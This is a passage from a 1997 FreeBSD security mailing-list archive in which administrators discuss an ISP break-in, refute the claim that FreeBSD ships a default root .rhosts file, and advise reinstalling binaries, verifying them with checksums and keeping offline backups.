the default directory itself. No: The file doesn't provide any security problems initially since it has '#' at every line and therefor can't be used without further modification. Maybe: There should be no dot.rhosts at all -- that might decrease the ammount of people using it and in return minimize headache to sys admins? Than again, maybe not. Almost positive: Sholdn't this threat be taken off line by now? From what I have seen the break-in has not occured due to the critical and/or unknown bug in the FreeBSD. On Mon, 28 Jul 1997, Annelise Anderson wrote: > >On Mon, 28 Jul 1997, John Preisler wrote: > >> I'm not convinced that FreeBSD installs a /root/.rhosts by default. >> None of my boxes have it. >> >> -jrp > >Neither do mine. > > Annelise > > From owner-freebsd-security Mon Jul 28 21:50:05 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA08139 for security-outgoing; Mon, 28 Jul 1997 21:50:05 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id VAA08125; Mon, 28 Jul 1997 21:50:00 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id VAA08271; Mon, 28 Jul 1997 21:49:51 -0700 (PDT) Date: Mon, 28 Jul 1997 21:49:50 -0700 (PDT) From: Vincent Poy To: Heikki Suonsivu cc: Gary Palmer , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <199707290434.HAA22497@katiska.clinet.fi> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Heikki Suonsivu wrote: =) =)Vincent Poy writes: =) > Machines are offline already. The hacker confronted us and said =) > that it was the default .rhosts file that came in the FreeBSD root account =) > and he used perl5.00401 which had a security hole and then used rlogin to =) > login to another machine without the password. =) =)There is no default .rhosts file in FreeBSD, so the hacker is probably =)trying to avoid telling you what was the real hole. =) =)Just for reference, there are large number of irc scripts which contain =)backdoors (often well-disguised), which usually create .rhosts file with "+ =)+" in it. The easiest way is to trick someone in the machine to run one of =)those scripts and it opens the machine, then use one of the FreeBSD =)holes or local misconfigurations to open the rest. I might just have gotten carried away about the .rhosts thing. You're probably right about the .rhosts file because it's in my directory on this machine but not in the root directory and the contents are just: # This file should NOT be group or other readable. #OtherMachine #OtherMachine myFriend I haven't used irc like for a few years. The machine is a irc server though. Not the one he originally hacked but the one he hacked after he hacked the first one. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 22:06:01 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA08873 for security-outgoing; Mon, 28 Jul 1997 22:06:01 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA08861 for ; Mon, 28 Jul 1997 22:05:47 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id WAA06651; Mon, 28 Jul 1997 22:05:43 -0700 (PDT) To: Vincent Poy cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 17:03:19 PDT." Date: Mon, 28 Jul 1997 22:05:43 -0700 Message-ID: <6647.870152743@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > =)That proves absolutely nothing. You think I can't hack a telnetd to > =)provide multiple "services?" Wake up, Vinnie! :-) > > Ofcourse you could but you're not in the same type of hacking > business this guy is in. This is a log of a irc chat session. My essential point remains unchanged. You can trust NONE of the binaries on your system now and it's strongly suggested that you reinstall whatever you cannot, through mtree/tripwire database checks, verify as absolutely pristine. I also suggest that you guys invest in a CDR drive and use it for periodic construction of trusted backup images. For an ISP, the cost/benefit ration is definitely there. Jordan From owner-freebsd-security Mon Jul 28 22:15:19 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA09699 for security-outgoing; Mon, 28 Jul 1997 22:15:19 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA09693 for ; Mon, 28 Jul 1997 22:15:16 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id WAA08350; Mon, 28 Jul 1997 22:15:04 -0700 (PDT) Date: Mon, 28 Jul 1997 22:15:02 -0700 (PDT) From: Vincent Poy To: "Jordan K. Hubbard" cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <6647.870152743@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jordan K. Hubbard wrote: =)> =)That proves absolutely nothing. You think I can't hack a telnetd to =)> =)provide multiple "services?" Wake up, Vinnie! :-) =)> =)> Ofcourse you could but you're not in the same type of hacking =)> business this guy is in. This is a log of a irc chat session. =) =)My essential point remains unchanged. You can trust NONE of the =)binaries on your system now and it's strongly suggested that you =)reinstall whatever you cannot, through mtree/tripwire database checks, =)verify as absolutely pristine. I also suggest that you guys invest in =)a CDR drive and use it for periodic construction of trusted backup =)images. For an ISP, the cost/benefit ration is definitely there. I know what you mean about the CDR drive. It's not that we had a choice since all of us are just volunteers running the system remotely. I'm planning to reinstall all the binaries anyways but it's kind of hard when I'm in Northern California and the owners are out of the country for 2-4 months leaving the machines in the closet totally unattended. I know /bin/sh and /bin/csh has been wiped so I need to be able to guide someone through how to use the floppy to copy the files back to the hd and then I'll fix it from there. Also, another thing is this ISP was free for the last 2 years until recently so maybe that's why the owners didn't put money into it but into other stuff instead. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 22:28:21 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA10626 for security-outgoing; Mon, 28 Jul 1997 22:28:21 -0700 (PDT) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA10620 for ; Mon, 28 Jul 1997 22:28:19 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id BAA21313; Tue, 29 Jul 1997 01:28:13 -0400 (EDT) Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id BAA29455; Tue, 29 Jul 1997 01:28:13 -0400 (EDT) To: Vincent Poy cc: Nate Williams , "Jonathan A. Zdziarski" , security@FreeBSD.ORG, JbHunt , "[Mario1-]" From: "Gary Palmer" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 21:12:44 PDT." Date: Tue, 29 Jul 1997 01:28:13 -0400 Message-ID: <29452.870154093@orion.webspan.net> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Vincent Poy wrote in message ID : > Nothing is unhackable. and the hacker did say it was the .rhosts > file along with perl5.00401 that did it. Nothing is foolproof. As evidenced by the fact you believe him. Questions that remain unanswered: 1) if he did use an .rhosts, how did the file get there? 2) I didn't know there was a setuid bug in perl 5.00401. What did he do to exploit perl? 3) Did you really talk to him on irc, or just some lamer pretending to have done the hack? and most importantly: 4) did you LEARN from this experience? If not, *WHY* not? Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 28 22:29:20 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA10694 for security-outgoing; Mon, 28 Jul 1997 22:29:20 -0700 (PDT) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA10689 for ; Mon, 28 Jul 1997 22:29:18 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id BAA21431; Tue, 29 Jul 1997 01:29:15 -0400 (EDT) Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id BAA29487; Tue, 29 Jul 1997 01:29:15 -0400 (EDT) To: Vincent Poy cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]" From: "Gary Palmer" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 21:19:25 PDT." Date: Tue, 29 Jul 1997 01:29:14 -0400 Message-ID: <29485.870154154@orion.webspan.net> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Vincent Poy wrote in message ID : > I'll try but some of these ISPs take like 3 weeks to respond even > if you mention legal action. They don't think you can do anything to them > because they are out of state. Don't mention legal action until the first round of complaints are not dealt with then ... simple. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 28 22:35:06 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA11035 for security-outgoing; Mon, 28 Jul 1997 22:35:06 -0700 (PDT) Received: from milehigh.denver.net (milehigh.denver.net [204.144.180.2]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA11029 for ; Mon, 28 Jul 1997 22:35:04 -0700 (PDT) Received: from localhost (jdc@localhost) by milehigh.denver.net (8.8.5/8.8.5) with SMTP id XAA28459 for ; Mon, 28 Jul 1997 23:38:25 -0600 (MDT) Date: Mon, 28 Jul 1997 23:38:24 -0600 (MDT) From: John-David Childs cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: > > =)Hrm if you always use kill -9 try the reverse, just a kill or a kill -15 > > I did that too. even kill -HUP only kills the master process. I > had to kill the child process manually. That's what the killall script is for :-) Since I've finally plowed through the dozens (hundreds? ;-) of messages on the subject... None of my FreeBSD systems have ever installed a /root/.rhosts file to my knowledge, unless it's been a zero length file. I'd have to grok the scripts, but I know for a fact that a FreeBSD install wouldn't know to create a /root/.rhosts that had the name of your other machine in it. Some one of your admins did that luser trick (e.g. to enable rsh/rcp). Second, my interpretation of the init man page suggests that securelevel 1 would PREVENT me from writing to mounted disks at the time the securelevel 1 is "invoked". So, for instance, if I used sysctl to change kern.securelevel from 0 to 1 *right now*, my server processes (httpd, sendmail, etc.) would suddenly blow up because they couldn't write to the disks. Thus, the only time one would want to invoke securelevel 1 would be from /etc/rc before the disks are mounted. Correct??? (The rest is dribble mostly directed to Vince, but possibly useful to others). Third, Vince stated something to the effect that Jordan Hubbard couldn't hold a candle to this hacker ("wasn't in the same league") and then posted IRC dribble. I'd bet this hacker couldn't hold a candle to Jordan and probably is just an luser with a copy of rootkit. (Just had to get that one off my mind ;) Fourth, you might as well take that machine off the net (turn it off) if you can't get physical access to it for 2-4 months. It's gone gone gone! If you've been telnetting to it forever with no encryption, tcpwrappers, or router filters, your hacker could have been on your system for weeks or months before acting up and you wouldn't have a clue.. A few years ago when I was a weenie (ok, I still am compared to Jordan and Nate and... ;-) I challenged (deliberately) some of my more clueful customers to hack me...one of them was root on my system for almost a month before I noticed suspicious activity. Your descriptions of comparing files between machines (e.g. comparing byte sizes/dates of telnetd) suggest that you never ran anything like tripwire/cops to compute checksums of the files. Thus, you'd have NO clue which files really might have been changed. And if you DID run Tripwire before the hacker, and ran it again after the hacker, but didn't compare the result to a known clean OFFLINE copy of the tripwire database (e.g. a paper/floppy copy)...forget it! :) -- John-David Childs (JC612) @denver.net/Internet-Coach/@ronan.net System Administrator Enterprise Internet Solutions & Network Engineer 901 E 17th Ave, Denver 80218 All programmers are playwrights and all computers are lousy actors. From owner-freebsd-security Mon Jul 28 22:35:46 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA11074 for security-outgoing; Mon, 28 Jul 1997 22:35:46 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA11067; Mon, 28 Jul 1997 22:35:40 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id WAA08469; Mon, 28 Jul 1997 22:35:36 -0700 (PDT) Date: Mon, 28 Jul 1997 22:35:36 -0700 (PDT) From: Vincent Poy To: Gary Palmer cc: Nate Williams , "Jonathan A. Zdziarski" , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <29452.870154093@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Gary Palmer wrote: =)Vincent Poy wrote in message ID =): =)> Nothing is unhackable. and the hacker did say it was the .rhosts =)> file along with perl5.00401 that did it. Nothing is foolproof. =) =)As evidenced by the fact you believe him. Questions that remain =)unanswered: =) =)1) if he did use an .rhosts, how did the file get there? That's what I'm trying to figure out. I know I never had a .rhosts file in my directory because I still have a tarball of my directory. =)2) I didn't know there was a setuid bug in perl 5.00401. What did he =) do to exploit perl? I don't know because all I know was he got a account on mercury.GAIANET.NET and complained perl5 wasn't working because the libmalloc file was missing. This was because the /usr/local/bin was a backup from another machine that had FreeBSD since 2.1R and we did this drive from scratch so it was perl5.003. So I did a cvsup and install perl5.00401 and that's when all the problems began. 5.003 is the one with security holes which we know about. =)3) Did you really talk to him on irc, or just some lamer pretending to =) have done the hack? I wasn't the one who talked to him but I know it's him because his ip address on irc will reach his Linux machine which he calls soma and that was the same guy who asked me about the perl thing. =)and most importantly: =) =)4) did you LEARN from this experience? If not, *WHY* not? Ofcourse... never trust anyone on the system. Too bad there wasn't a way to watch everyone or log there commands. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 22:37:49 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA11219 for security-outgoing; Mon, 28 Jul 1997 22:37:49 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA11210; Mon, 28 Jul 1997 22:37:44 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id WAA08486; Mon, 28 Jul 1997 22:37:40 -0700 (PDT) Date: Mon, 28 Jul 1997 22:37:39 -0700 (PDT) From: Vincent Poy To: Gary Palmer cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <29485.870154154@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Gary Palmer wrote: =)Vincent Poy wrote in message ID =): =)> I'll try but some of these ISPs take like 3 weeks to respond even =)> if you mention legal action. They don't think you can do anything to them =)> because they are out of state. =) =)Don't mention legal action until the first round of complaints are not =)dealt with then ... simple. I've done that before too... If I don't mention legal action, they will never respond. I guess they just think it's not their system so they could care less. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 22:40:37 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA11445 for security-outgoing; Mon, 28 Jul 1997 22:40:37 -0700 (PDT) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA11437 for ; Mon, 28 Jul 1997 22:40:35 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id BAA22932; Tue, 29 Jul 1997 01:40:31 -0400 (EDT) Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id BAA02484; Tue, 29 Jul 1997 01:40:31 -0400 (EDT) To: Vincent Poy cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]" From: "Gary Palmer" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 22:37:39 PDT." Date: Tue, 29 Jul 1997 01:40:31 -0400 Message-ID: <2482.870154831@orion.webspan.net> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Vincent Poy wrote in message ID : > I've done that before too... If I don't mention legal action, > they will never respond. I guess they just think it's not their system so > they could care less. Don't think that about Erols until you try ... I know the person who answers the abuse mail. I think he'd be offended by that statement. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 28 22:44:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA11954 for security-outgoing; Mon, 28 Jul 1997 22:44:35 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA11946; Mon, 28 Jul 1997 22:44:30 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id WAA08523; Mon, 28 Jul 1997 22:44:24 -0700 (PDT) Date: Mon, 28 Jul 1997 22:44:23 -0700 (PDT) From: Vincent Poy To: Gary Palmer cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <2482.870154831@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Gary Palmer wrote: =)Vincent Poy wrote in message ID =): =)> I've done that before too... If I don't mention legal action, =)> they will never respond. I guess they just think it's not their system so =)> they could care less. =) =)Don't think that about Erols until you try ... I know the person who =)answers the abuse mail. I think he'd be offended by that statement. I wasn't talking about erols but with some isp's for things such as relaying spam mail. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 22:51:06 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA12445 for security-outgoing; Mon, 28 Jul 1997 22:51:06 -0700 (PDT) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA12440 for ; Mon, 28 Jul 1997 22:51:03 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id BAA24219; Tue, 29 Jul 1997 01:50:59 -0400 (EDT) Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id BAA05362; Tue, 29 Jul 1997 01:50:59 -0400 (EDT) To: Vincent Poy cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]" From: "Gary Palmer" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 22:44:23 PDT." Date: Tue, 29 Jul 1997 01:50:59 -0400 Message-ID: <5360.870155459@orion.webspan.net> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Vincent Poy wrote in message ID : > I wasn't talking about erols but with some isp's for things such > as relaying spam mail. You can take legal action against people who's machines were exploited to relay spam mail? Wow! I think perhaps you have to understand that if they were used as a relay for spam mail, they are going to get *FLOODED* with mail (I know from experience). Theres not a thing you can do (well, I stayed up all night once and fitted anti-relay rules to sendmail, but in the past they weren't available). Most people will just delete or refile the complaints, since they can't really do anything about the user originated them. Complaining to relays rarely does any good. Either they can't be bothered to fix it, or don't know how. Thats when cisco access list rules to block their mail hosts come in handy. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 28 22:56:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA12930 for security-outgoing; Mon, 28 Jul 1997 22:56:07 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA12882; Mon, 28 Jul 1997 22:56:00 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id WAA08587; Mon, 28 Jul 1997 22:55:56 -0700 (PDT) Date: Mon, 28 Jul 1997 22:55:55 -0700 (PDT) From: Vincent Poy To: Gary Palmer cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <5360.870155459@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Gary Palmer wrote: =)Vincent Poy wrote in message ID =): =)> I wasn't talking about erols but with some isp's for things such =)> as relaying spam mail. =) =)You can take legal action against people who's machines were exploited =)to relay spam mail? Wow! No not really but I was talking abouse people who were using aol.com accounts and psi.net accounts to send mail using us as a relay and then it uses the other machines as a relay too but all the mails will bounce to the postmaster address on our machine. =)I think perhaps you have to understand that if they were used as a =)relay for spam mail, they are going to get *FLOODED* with mail (I know =)from experience). Theres not a thing you can do (well, I stayed up all =)night once and fitted anti-relay rules to sendmail, but in the past =)they weren't available). Most people will just delete or refile the =)complaints, since they can't really do anything about the user =)originated them. Complaining to relays rarely does any good. Either =)they can't be bothered to fix it, or don't know how. Thats when cisco =)access list rules to block their mail hosts come in handy. I know what you mean here. We tried sendmail anti-relay rules. While it worked, there were more problems generated than it fixed. All I know is some companies use something other than sendmail they custom designed and had a way to kill the process but for icmp floods, the ISP would be responsible since it's a DoS attack. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 23:00:03 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA13190 for security-outgoing; Mon, 28 Jul 1997 23:00:03 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA13139 for ; Mon, 28 Jul 1997 22:59:59 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id WAA06898; Mon, 28 Jul 1997 22:59:31 -0700 (PDT) To: Vincent Poy cc: "Jonathan A. Zdziarski" , "[Mario1-]" , JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 17:27:15 PDT." Date: Mon, 28 Jul 1997 22:59:31 -0700 Message-ID: <6894.870155971@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Just a update on how the break-in was done after the hacker was > confronted on irc. > > Apparently FreeBSD ships with .rhosts in the root account. Using No, FreeBSD does not ship with .rhosts in the root account. This must have been a local change. If you do not believe this then simply do a fresh installation of FreeBSD and see for yourself - sorry, you shot your own feet off here. :-) Jordan From owner-freebsd-security Mon Jul 28 23:02:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA13468 for security-outgoing; Mon, 28 Jul 1997 23:02:55 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA13463 for ; Mon, 28 Jul 1997 23:02:53 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id XAA08630; Mon, 28 Jul 1997 23:02:15 -0700 (PDT) Date: Mon, 28 Jul 1997 23:02:15 -0700 (PDT) From: Vincent Poy To: "Jordan K. Hubbard" cc: "Jonathan A. Zdziarski" , "[Mario1-]" , JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <6894.870155971@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jordan K. Hubbard wrote: =)> Just a update on how the break-in was done after the hacker was =)> confronted on irc. =)> =)> Apparently FreeBSD ships with .rhosts in the root account. Using =) =)No, FreeBSD does not ship with .rhosts in the root account. This must =)have been a local change. If you do not believe this then simply do a =)fresh installation of FreeBSD and see for yourself - sorry, you shot =)your own feet off here. :-) I just verified it and you're right. It doesn't but what about the adduser program? I have a tarball of my home directory and there is no .rhosts there either. I wonder how the .rhosts got there in the first place. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 23:08:05 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA13795 for security-outgoing; Mon, 28 Jul 1997 23:08:05 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA13779 for ; Mon, 28 Jul 1997 23:08:02 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id XAA06942; Mon, 28 Jul 1997 23:07:58 -0700 (PDT) To: Annelise Anderson cc: John Preisler , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 20:41:32 PDT." Date: Mon, 28 Jul 1997 23:07:58 -0700 Message-ID: <6938.870156478@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk As I've already pointed out, Vince is sadly confused here. It would hardly be the first time. :-) > On Mon, 28 Jul 1997, John Preisler wrote: > > > I'm not convinced that FreeBSD installs a /root/.rhosts by default. > > None of my boxes have it. > > > > -jrp > > Neither do mine. > > Annelise > From owner-freebsd-security Mon Jul 28 23:11:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA14111 for security-outgoing; Mon, 28 Jul 1997 23:11:35 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA14106 for ; Mon, 28 Jul 1997 23:11:32 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) 